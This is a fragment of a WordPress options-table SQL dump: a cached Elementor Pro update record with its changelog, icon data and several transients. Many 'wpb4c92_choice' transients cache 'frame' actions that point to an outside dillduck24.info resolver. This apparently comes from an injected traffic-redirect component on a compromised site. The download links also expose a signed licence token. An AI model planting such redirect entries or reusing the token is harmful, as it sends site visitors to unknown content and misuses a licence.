words<\\/li>\\n<\\/ul>\\n<h4>1.6.1 - 2017-08-28<\\/h4>\\n<ul>\\n<li>Fix: Animated Headline marker gets in front of neighboring spans even when "Bring to Front" is not set<\\/li>\\n<li>Fix: Stroke animation in Animated Headline for MS Edge browser<\\/li>\\n<li>Fix: Animated headline with more than 1-word per rotation<\\/li>\\n<li>Fix: Animated Headline in two lines<\\/li>\\n<li>Fix: Some errors in Global widget<\\/li>\\n<\\/ul>\\n<h4>1.6.0 - 2017-08-22<\\/h4>\\n<ul>\\n<li>New: Added Animated Headline widget<\\/li>\\n<li>New: Added Hidden field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2038\\\">#2038<\\/a>)<\\/li>\\n<li>Tweak: Added notice to update Elementor to v1.6.5 or higher<\\/li>\\n<li>Fix: CSS Animations names no longer minified, in order to prevent unexpected conflicts<\\/li>\\n<\\/ul>\\n<h4>1.5.9 - 2017-08-16<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.7<\\/li>\\n<li>Fix: Portfolio compatibility for GeneratePress theme<\\/li>\\n<li>Fix: Portfolio filter compatibility for RTL<\\/li>\\n<li>Fix: Pagination apply for all posts widget in the page<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.8 - 2017-07-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.6<\\/li>\\n<li>Fix: Improved backward compatibility for query control rename<\\/li>\\n<\\/ul>\\n<h4>1.5.7 - 2017-07-24<\\/h4>\\n<ul>\\n<li>Tweak: Moved JS render of reCAPTCHA to a separate file<\\/li>\\n<li>Tweak: Display the label in the reCAPTCHA field for better experience<\\/li>\\n<li>Tweak: Rename <code>panel-posts-control<\\/code> to <code>query-control<\\/code> and added fallback support<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor with history feature<\\/li>\\n<li>Fix: reCAPTCHA preview on the editor<\\/li>\\n<li>Fix: Manual selection (query control) has stopped working after saving (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2000\\\">#2000<\\/a>)<\\/li>\\n<li>Fix: Added condition for icon size control in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.5.6 - 2017-07-12<\\/h4>\\n<ul>\\n<li>Fix: Query Control correction for taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1963\\\">#1963<\\/a>)<\\/li>\\n<li>Fix: Custom CSS override scheme color in the editor<\\/li>\\n<li>Fix: Added order by Menu Order for Query Control in WC widget<\\/li>\\n<li>Fix: Glitch with Flip Box background overlay<\\/li>\\n<\\/ul>\\n<h4>1.5.5 - 2017-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Moved reCAPTCHA render to handler & load only if a form is exist<\\/li>\\n<li>Fix: MailChimp integration: Default number of items returned by API increased to 999<\\/li>\\n<li>Fix: MailChimp integration: Refresh the groups list if API is changed<\\/li>\\n<li>Fix: Sorted items in filter bar by A-Z<\\/li>\\n<li>Fix: Editor glitch with Elementor v1.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1927\\\">#1927<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.5.4 - 2017-06-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved compatibility for Elementor v1.5<\\/li>\\n<li>Fix: URL default for Add To Cart widget<\\/li>\\n<li>Fix: Allowed <code>date<\\/code> and <code>birthday<\\/code> fields as text for MailChimp integration<\\/li>\\n<\\/ul>\\n<h4>1.5.3 - 2017-06-19<\\/h4>\\n<ul>\\n<li>Tweak: Make flip-box height responsive control<\\/li>\\n<li>Fix: Facebook share count now gets retrieved by Elementor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1829\\\">#1829<\\/a>)<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.2 - 2017-06-13<\\/h4>\\n<ul>\\n<li>Fix: Custom CSS panel location compatibility for the old versions<\\/li>\\n<\\/ul>\\n<h4>1.5.1 - 2017-06-12<\\/h4>\\n<ul>\\n<li>Fix: MailChimp update existing user registration<\\/li>\\n<li>Fix: Global widget with JS in the editor mode<\\/li>\\n<li>Fix: Label section condition in Login widget<\\/li>\\n<li>Fix: Changes to unlinked global widget do not appear in the editor<\\/li>\\n<\\/ul>\\n<h4>1.5.0 - 2017-05-23<\\/h4>\\n<ul>\\n<li>New: Added Cards, a new skin for Posts widget<\\/li>\\n<li>New: Added Exclude option to post query control group<\\/li>\\n<li>Tweak: Added <code>post_class()<\\/code> for each post in the loop<\\/li>\\n<li>Tweak: Added <code>.elementor-posts-masonry<\\/code> class when Masonry layout is enabled<\\/li>\\n<li>Tweak: Added compatibility for the next release of Elementor v1.5.0<\\/li>\\n<li>Tweak: CSS <code>autoprefixer<\\/code> now supports last 5 versions of browsers<\\/li>\\n<li>Tweak: Added <code>imageLoaded<\\/code> library for Posts & Portfolio widgets<\\/li>\\n<\\/ul>\\n<h4>1.4.4 - 2017-05-18<\\/h4>\\n<ul>\\n<li>Fix: Force Mailchimp API to return all lists and not just 10 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1683\\\">#1683<\\/a>)<\\/li>\\n<li>Fix: Added <code>.elementor-form<\\/code> class to Login form to fix style glitch<\\/li>\\n<\\/ul>\\n<h4>1.4.3 - 2017-05-14<\\/h4>\\n<ul>\\n<li>Tweak: Added Redirect After Login option to Login widget<\\/li>\\n<li>Tweak: Stay in the current page after logout in Login widget<\\/li>\\n<li>Tweak: Preparation for Elementor settings tabs in future version<\\/li>\\n<li>Fix: Pinterest in Share Buttons widget now sharing the URL alone<\\/li>\\n<li>Fix: Bug with <code>active<\\/code> class in portfolio filter item<\\/li>\\n<li>Fix: Higher specific list-style-type <code>none<\\/code> for filter items to override some theme style<\\/li>\\n<\\/ul>\\n<h4>1.4.2 - 2017-05-06<\\/h4>\\n<ul>\\n<li>Fix: Temporary patch for form field shortcode in some servers<\\/li>\\n<\\/ul>\\n<h4>1.4.1 - 2017-05-03<\\/h4>\\n<ul>\\n<li>Fix: Bug with custom success message in form widget<\\/li>\\n<li>Fix: Bug with meta data in email action<\\/li>\\n<\\/ul>\\n<h4>1.4.0 - 2017-05-03<\\/h4>\\n<ul>\\n<li>New: Forms: integration with MailChimp<\\/li>\\n<li>New: Forms: integration with MailPoet<\\/li>\\n<li>New: Forms: Added Email 2 action for email confirmation<\\/li>\\n<li>New: Forms: Added shortcodes for fields<\\/li>\\n<li>New: Forms: Added custom ID for fields<\\/li>\\n<li>New: Forms: Added option to edit email HTML template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>New: Added Login widget<\\/li>\\n<li>Tweak: Move <code>send_html<\\/code> control to <code>email_content_type<\\/code><\\/li>\\n<li>Fix: Email still sent even if validation failed in form widget<\\/li>\\n<\\/ul>\\n<h4>1.3.2 - 2017-05-01<\\/h4>\\n<ul>\\n<li>New: Added action <code>elementor_pro\\/init<\\/code> for better integration with Elementor Pro<\\/li>\\n<li>Fix: Posts without featured image in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1234\\\">#1234<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1382\\\">#1382<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA & Honeypot fields with new method<\\/li>\\n<li>Fix: Added border width control in Share Buttons to avoid a glitch on Chrome browser<\\/li>\\n<li>Fix: Border radius glitch on hover in Share Buttons<\\/li>\\n<\\/ul>\\n<h4>1.3.1 - 2017-04-25<\\/h4>\\n<ul>\\n<li>Fix: Conflict update with revision history module<\\/li>\\n<\\/ul>\\n<h4>1.3.0 - 2017-04-25<\\/h4>\\n<ul>\\n<li>New: Added Share Buttons widget (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/social-sharing-buttons-is-it-possible\\/\\\">Topic<\\/a>)<\\/li>\\n<li>New: Added Custom CSS for Page Settings<\\/li>\\n<li>New: Added Masonry layout for Portfolio widget<\\/li>\\n<li>New: Added Cc & Bcc options to email action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1181\\\">#1181<\\/a>)<\\/li>\\n<li>New: Introduced <code>ElementorPro\\\\Modules\\\\Forms\\\\Classes\\\\Action_Base<\\/code> class for better 3rd party integration for forms<\\/li>\\n<li>Tweak: Debugger module now also shows errors from Pro<\\/li>\\n<li>Tweak: Added options for Elementor Library<\\/li>\\n<li>Tweak: New base posts module for optimized performance<\\/li>\\n<li>Tweak: Adjusting Posts \\/ Portfolio to the new structure<\\/li>\\n<li>Fix: Export for posts \\/ portfolio<\\/li>\\n<li>Fix: Duplicate repeater field with switcher control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1442\\\">#1442<\\/a>)<\\/li>\\n<li>Fix: Post per Page in the query control<\\/li>\\n<li>Fix: Metadata does not come through on form emails (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1566\\\">#1566<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.2.6 - 2017-04-19<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with WooCommerce 3.0 - Products & Add to Cart widgets<\\/li>\\n<\\/ul>\\n<h4>1.2.5 - 2017-04-18<\\/h4>\\n<ul>\\n<li>Fix: Offset query for posts widgets (Posts, Portfolio and Products)<\\/li>\\n<\\/ul>\\n<h4>1.2.4 - 2017-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added Indian Rupee sign to Price Table widget<\\/li>\\n<li>Fix: Portfolio grid for IE11<\\/li>\\n<li>Fix: Link target blank in Price List widget<\\/li>\\n<li>Fix: Active item for filter bar in Portfolio widget<\\/li>\\n<\\/ul>\\n<h4>1.2.3 - 2017-03-06<\\/h4>\\n<ul>\\n<li>Tweak: Fully compatible with Elementor v1.3.0<\\/li>\\n<li>Tweak: Added trigger for after form submission in Forms widget<\\/li>\\n<li>Tweak: Changed handle name in reCAPTCHA field to avoid conflict with other contact forms<\\/li>\\n<li>Fix: Portfolio filter syntax in Non-Latin languages<\\/li>\\n<li>Fix: Added <code>no-repeat<\\/code> property for slide with <code>background-size:contain<\\/code><\\/li>\\n<li>Fix: Condition control & Import value in Posts widgets<\\/li>\\n<li>Fix: Offset and Pagination in WordPress (<a href=\\\"https:\\/\\/codex.wordpress.org\\/Making_Custom_Queries_using_Offset_and_Pagination\\\">More Info<\\/a>)<\\/li>\\n<li>Fix: Submit handler bubbling for custom events in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.2.2 - 2017-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Change name from Side A\\/B to Front and Back in Flip Box widget<\\/li>\\n<li>Fix: Error when saving third party widgets in the global widget<\\/li>\\n<li>Fix: Image position "none" remains visible in editor preview (Posts)<\\/li>\\n<li>Fix: Hide the pagination when there are no links<\\/li>\\n<\\/ul>\\n<h4>1.2.1 - 2017-02-21<\\/h4>\\n<ul>\\n<li>Fix: Firefox Flip Box 3D compatibility<\\/li>\\n<\\/ul>\\n<h4>1.2.0 - 2017-02-21<\\/h4>\\n<ul>\\n<li>New: Added Flip Box widget<\\/li>\\n<li>New: Added Ken Burns effect for slides<\\/li>\\n<li>New: Added Masonry layout for Posts widget<\\/li>\\n<li>New: Added Pagination option for Posts widget<\\/li>\\n<li>Tweak: Added background size contain to slides<\\/li>\\n<li>Tweak: Improve Query control by preload items<\\/li>\\n<li>Fix: Text color for Checkbox and Radio fields<\\/li>\\n<\\/ul>\\n<h4>1.1.2 - 2017-02-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>aria-required<\\/code> for better accessibility in forms widget<\\/li>\\n<li>Fix: Conflict Call to <code>undefined<\\/code> method in Posts & Portfolio widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1271\\\">#1271<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1266\\\">#1266<\\/a>)<\\/li>\\n<li>Fix: Submit button HTML after error sending<\\/li>\\n<li>Fix: Success message for <code>skip_email<\\/code> function<\\/li>\\n<li>Notice: Elementor 1.2.0 or later now required<\\/li>\\n<\\/ul>\\n<h4>1.1.1 - 2017-01-24<\\/h4>\\n<ul>\\n<li>Fix: Can't save global widgets when <code>WP_DEBUG<\\/code> is <code>true<\\/code><\\/li>\\n<li>Fix: Undefined variable in WC widgets<\\/li>\\n<li>Fix: Removed duplicate strings<\\/li>\\n<\\/ul>\\n<h4>1.1.0 - 2017-01-24<\\/h4>\\n<ul>\\n<li>New: Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/102\\\">#102<\\/a>)<\\/li>\\n<li>New: WooCommerce Add to Cart widget<\\/li>\\n<li>New: WooCommerce Categories widget<\\/li>\\n<li>New: WooCommerce Elements widget<\\/li>\\n<li>New: Honeypot field for Forms widgets<\\/li>\\n<li>Tweak: Added inline options for taxonomies & authors if is less than 15 items<\\/li>\\n<li>Tweak: Added Required Mark for fields in Forms widget<\\/li>\\n<li>Fix: CSS selectors priority in Slides widget<\\/li>\\n<li>Fix: CSS bug in Price List widget<\\/li>\\n<li>Fix: Update all Post CSS files that includes specific Global Widget<\\/li>\\n<\\/ul>\\n<h4>1.0.9 - 2017-01-18<\\/h4>\\n<ul>\\n<li>Fix: Auto complete bug in query controls<\\/li>\\n<li>Fix: Render template with escaping slashes<\\/li>\\n<li>Fix: Reply-to field in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.0.8 - 2017-01-11<\\/h4>\\n<ul>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Removed go pro link from plugins page in admin<\\/li>\\n<\\/ul>\\n<h4>1.0.7 - 2017-01-05<\\/h4>\\n<ul>\\n<li>Tweak: Added filter by featured \\/ sale for WC Products widget<\\/li>\\n<li>Tweak: Added author control in Portfolio widget<\\/li>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Added support for empty image ratio<\\/li>\\n<li>Fix: Avoid nesting a sidebar within a template that will appear in the sidebar itself<\\/li>\\n<\\/ul>\\n<h4>1.0.6 - 2017-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Added Auto-updates for local translation files<\\/li>\\n<li>Fix: Custom CSS for Global widgets<\\/li>\\n<li>Fix: Remove <code>nonce<\\/code> field (Fix some cache plugins)<\\/li>\\n<\\/ul>\\n<h4>1.0.5 - 2016-12-27<\\/h4>\\n<ul>\\n<li>Fix: Slide element bug fix - 'Link apply on' logic<\\/li>\\n<li>Fix: Removed unique wrapper for Custom CSS in order to allow media queries (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1086\\\">#1086<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.0.4 - 2016-12-21<\\/h4>\\n<ul>\\n<li>Tweak: Mobile Editing for fields in the form widget<\\/li>\\n<li>Tweak: Mobile Editing for posts<\\/li>\\n<li>Tweak: Allow send form as HTML<\\/li>\\n<li>Tweak: Improved auto upgrades for Multisite installation<\\/li>\\n<li>Tweak: Improve editor rendering experience for Portfolio widget<\\/li>\\n<li>Fix: Posts widget check if image exist<\\/li>\\n<li>Fix: Changed the clone method for global widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1042\\\">#1042<\\/a>)<\\/li>\\n<li>Fix: Bug slides in RTL (removed direction control)<\\/li>\\n<li>Fix: Slides with no height jumps when changing slides<\\/li>\\n<\\/ul>\\n<h4>1.0.3 - 2016-12-13<\\/h4>\\n<ul>\\n<li>Fix: Added escape placeholder for HTML Entities in form widget<\\/li>\\n<li>Fix: Countdown widget RTL bug<\\/li>\\n<li>Fix: Remove redundant #elementor selector for control style<\\/li>\\n<li>Fix: Added prefixing with '0' for one digit number in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>1.0.2 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: Page layout collapses when inserting reCAPTCHA field in Form<\\/li>\\n<\\/ul>\\n<h4>1.0.1 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: WordPress widgets disappear from Editor when Elementor Pro active<\\/li>\\n<\\/ul>\\n<h4>1.0.0 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Initial release<\\/li>\\n<\\/ul>\\n\\\";}\",\"new_version\":\"4.2.3\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"6.8\",\"tested\":\"7.1\",\"elementor_requires\":\"3.34\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiZXAteHphUWFIRzRtcWRJWWhRR0dTd0sxNzIxMjEwNDgyeVhHdHkwN2hUVHNCIiwidXJsIjoiaHR0cHM6Ly9hbWIxOGIuY29tIiwiZG93bmxvYWRfYmV0YSI6ZmFsc2UsImZpbGVfa2V5IjoiMSIsImlhdCI6MTc4ODQ0ODAxMywiZXhwIjoxNzg4NTM0NDEzfQ.gReG6qSgipW2DBgISyiWyvrHRdq-2U7RpYnJgd5SCHc\\/package_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiZXAteHphUWFIRzRtcWRJWWhRR0dTd0sxNzIxMjEwNDgyeVhHdHkwN2hUVHNCIiwidXJsIjoiaHR0cHM6Ly9hbWIxOGIuY29tIiwiZG93bmxvYWRfYmV0YSI6ZmFsc2UsImZpbGVfa2V5IjoiMSIsImlhdCI6MTc4ODQ0ODAxMywiZXhwIjoxNzg4NTM0NDEzfQ.gReG6qSgipW2DBgISyiWyvrHRdq-2U7RpYnJgd5SCHc\\/package_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/assets.elementor.com\\/miscellaneous\\/v1\\/images\\/icon.svg\"},\"requires_php\":\"7.4\"}\";}','off'),(91560,'_elementor_assets_data','a:1:{s:3:\"svg\";a:1:{s:9:\"font-icon\";a:4:{s:14:\"eicon-menu-bar\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"path\";s:279:\"M104 333H896C929 333 958 304 958 271S929 208 896 208H104C71 208 42 237 42 271S71 333 104 333ZM104 583H896C929 583 958 554 958 521S929 458 896 458H104C71 458 42 487 42 521S71 583 104 583ZM104 833H896C929 833 958 804 958 771S929 708 896 708H104C71 708 42 737 42 771S71 833 104 833Z\";s:3:\"key\";s:14:\"eicon-menu-bar\";}s:7:\"version\";s:6:\"5.13.0\";}s:11:\"eicon-close\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"path\";s:361:\"M742 167L500 408 258 167C246 154 233 150 217 150 196 150 179 158 167 167 154 179 150 196 150 212 150 229 154 242 171 254L408 500 167 742C138 771 138 800 167 829 196 858 225 858 254 829L496 587 738 829C750 842 767 846 783 846 800 846 817 842 829 829 842 817 846 804 846 783 846 767 842 750 829 737L588 500 833 258C863 229 863 200 833 171 804 137 775 137 742 167Z\";s:3:\"key\";s:11:\"eicon-close\";}s:7:\"version\";s:6:\"5.13.0\";}s:14:\"fas-caret-down\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:320;s:6:\"height\";i:512;s:4:\"path\";s:119:\"M31.3 192h257.3c17.8 0 26.7 21.5 14.1 34.1L174.1 354.8c-7.8 7.8-20.5 7.8-28.3 0L17.2 226.1C4.6 213.5 13.5 192 31.3 192z\";s:3:\"key\";s:14:\"fas-caret-down\";}s:7:\"version\";s:6:\"5.15.3\";}s:8:\"fas-gift\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"path\";s:498:\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\";s:3:\"key\";s:8:\"fas-gift\";}s:7:\"version\";s:6:\"5.15.3\";}}}}','auto'),(91630,'_transient_timeout_wpseo_unindexed_post_link_count','1788542494','off'),(91631,'_transient_wpseo_unindexed_post_link_count','0','off'),(92217,'_transient_timeout_wpb4c92_choice_c9f4e2bbd55942f9440602f9e2914922','1788523432','off'),(92218,'_transient_wpb4c92_choice_c9f4e2bbd55942f9440602f9e2914922','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92231,'_transient_timeout_wpb4c92_choice_2d5107239dc67ed00a5be6e3fa49e730','1788528261','off'),(92232,'_transient_wpb4c92_choice_2d5107239dc67ed00a5be6e3fa49e730','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92275,'_transient_timeout_wpb4c92_choice_b36fc6bceca76317e61e7e9b10085fc4','1788529033','off'),(92276,'_transient_wpb4c92_choice_b36fc6bceca76317e61e7e9b10085fc4','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92279,'_transient_timeout_wpb4c92_choice_837769134fa2eeefe4e1f58663d715b6','1788529454','off'),(92280,'_transient_wpb4c92_choice_837769134fa2eeefe4e1f58663d715b6','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92284,'_transient_timeout_wpb4c92_choice_fe957b5384e72c8705bbb3aa5ac28ac9','1788529743','off'),(92285,'_transient_wpb4c92_choice_fe957b5384e72c8705bbb3aa5ac28ac9','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92355,'_transient_timeout_wpb4c92_choice_1e4897197fba4b179afb14faa197928e','1788538925','off'),(92356,'_transient_wpb4c92_choice_1e4897197fba4b179afb14faa197928e','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92364,'_transient_timeout_wpb4c92_choice_ed231b7817b2691474ac14080576dd39','1788540139','off'),(92365,'_transient_wpb4c92_choice_ed231b7817b2691474ac14080576dd39','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92370,'_transient_timeout_wpb4c92_choice_46d6fb8baf97d9dc85b8efee9e365a1d','1788540779','off'),(92371,'_transient_wpb4c92_choice_46d6fb8baf97d9dc85b8efee9e365a1d','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92373,'_transient_timeout_wpb4c92_choice_1d82fa778ba6f4bb30c5db503632fdb6','1788541350','off'),(92374,'_transient_wpb4c92_choice_1d82fa778ba6f4bb30c5db503632fdb6','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92376,'_transient_timeout_wpb4c92_choice_196691f0697f848ff39fffb62b4228c7','1788541630','off'),(92377,'_transient_wpb4c92_choice_196691f0697f848ff39fffb62b4228c7','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92405,'_transient_timeout_wpb4c92_choice_b738c606e624a3fd884b7637290d1444','1788547267','off'),(92406,'_transient_wpb4c92_choice_b738c606e624a3fd884b7637290d1444','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92414,'_transient_timeout_wpb4c92_choice_73ecde63052d6b55bd06f172e75272bd','1788549562','off'),(92415,'_transient_wpb4c92_choice_73ecde63052d6b55bd06f172e75272bd','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92425,'_transient_timeout_wpb4c92_choice_089afad5edcf704c2bd302b609ff7670','1788552535','off'),(92426,'_transient_wpb4c92_choice_089afad5edcf704c2bd302b609ff7670','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92461,'_transient_timeout_wpb4c92_choice_530f644f0037d2704ec9aeff2cadb83e','1788554740','off'),(92462,'_transient_wpb4c92_choice_530f644f0037d2704ec9aeff2cadb83e','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92475,'_transient_timeout_wpb4c92_choice_6634dd58c9ba2d22ab43c4b3560caed9','1788557557','off'),(92476,'_transient_wpb4c92_choice_6634dd58c9ba2d22ab43c4b3560caed9','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92481,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1788568935;s:8:\"response\";a:1:{s:31:\"elementor-pro/elementor-pro.php\";O:8:\"stdClass\":16:{s:14:\"stable_version\";s:5:\"4.2.3\";s:12:\"last_updated\";s:19:\"2026-08-31 15:08:32\";s:11:\"new_version\";s:5:\"4.2.3\";s:4:\"name\";s:13:\"Elementor Pro\";s:4:\"slug\";s:13:\"elementor-pro\";s:3:\"url\";s:36:\"https://elementor.com/pro/changelog/\";s:8:\"homepage\";s:26:\"https://elementor.com/pro/\";s:8:\"requires\";s:3:\"6.8\";s:6:\"tested\";s:3:\"7.1\";s:18:\"elementor_requires\";s:4:\"3.34\";s:7:\"package\";s:367:\"https://plugin-downloads.elementor.com/v2/package_download/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiZXAteHphUWFIRzRtcWRJWWhRR0dTd0sxNzIxMjEwNDgyeVhHdHkwN2hUVHNCIiwidXJsIjoiaHR0cHM6Ly9hbWIxOGIuY29tIiwiZG93bmxvYWRfYmV0YSI6ZmFsc2UsImZpbGVfa2V5IjoiMSIsImlhdCI6MTc4ODQ0ODAxMywiZXhwIjoxNzg4NTM0NDEzfQ.gReG6qSgipW2DBgISyiWyvrHRdq-2U7RpYnJgd5SCHc/package_download\";s:13:\"download_link\";s:367:\"https://plugin-downloads.elementor.com/v2/package_download/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiZXAteHphUWFIRzRtcWRJWWhRR0dTd0sxNzIxMjEwNDgyeVhHdHkwN2hUVHNCIiwidXJsIjoiaHR0cHM6Ly9hbWIxOGIuY29tIiwiZG93bmxvYWRfYmV0YSI6ZmFsc2UsImZpbGVfa2V5IjoiMSIsImlhdCI6MTc4ODQ0ODAxMywiZXhwIjoxNzg4NTM0NDEzfQ.gReG6qSgipW2DBgISyiWyvrHRdq-2U7RpYnJgd5SCHc/package_downl